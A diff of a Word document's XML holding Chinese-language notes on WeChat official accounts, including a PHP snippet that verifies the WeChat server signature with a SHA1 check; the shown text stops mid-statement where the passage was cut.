-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:t>参数中加入</w:t>
             </w:r>
@@ -16133,11 +16128,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -16179,13 +16169,7 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -16568,11 +16552,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -16615,11 +16594,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -16756,13 +16730,7 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+          <w:p/>
           <w:p>
             <w:r>
               <w:rPr>
@@ -16847,11 +16815,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -16892,15 +16855,2325 @@
                 </wp:inline>
               </w:drawing>
             </w:r>
-            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="2"/>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p/>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，微信公众账号</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">4.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>微信公众号基础</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6439"/>
+        <w:gridCol w:w="6364"/>
+        <w:gridCol w:w="6516"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>公众账号类别</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46C5DFDF" wp14:editId="321FD6DB">
+                  <wp:extent cx="3951605" cy="1544320"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="46" name="图片 46"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId61"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="1544320"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>接口介绍</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B2EFEF0" wp14:editId="790C7A10">
+                  <wp:extent cx="3951605" cy="812165"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+                  <wp:docPr id="52" name="图片 52"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId62"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="812165"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>接入公众号</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>API</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>用于配置服务器和微信后台服务器的连接</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>//1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>，将</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>timestamp</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>nonce</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>token</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>按字典排序</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$timestamp=$_GET['timestamp'];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$nonce=$_GET['nonce'];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$token="</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>barret</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>";</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>在微信后台设置的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>token</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>字符串</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$signature=$_GET['signature'];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$array=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>array</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>($</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>timestamp,$nonce,$token</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>sort</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>($</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>array,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>SORT_STRING</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>//2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>，将三个排序后参数拼接后用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>sha1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>加密</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>tmpstr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>implode</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>($array);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>tmpstr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>sha1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>($</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>tmpstr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>//3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>，加密后字符串与</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>signature</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>进行对比，判断是否来自微信</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">if </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>($</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>tmpstr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
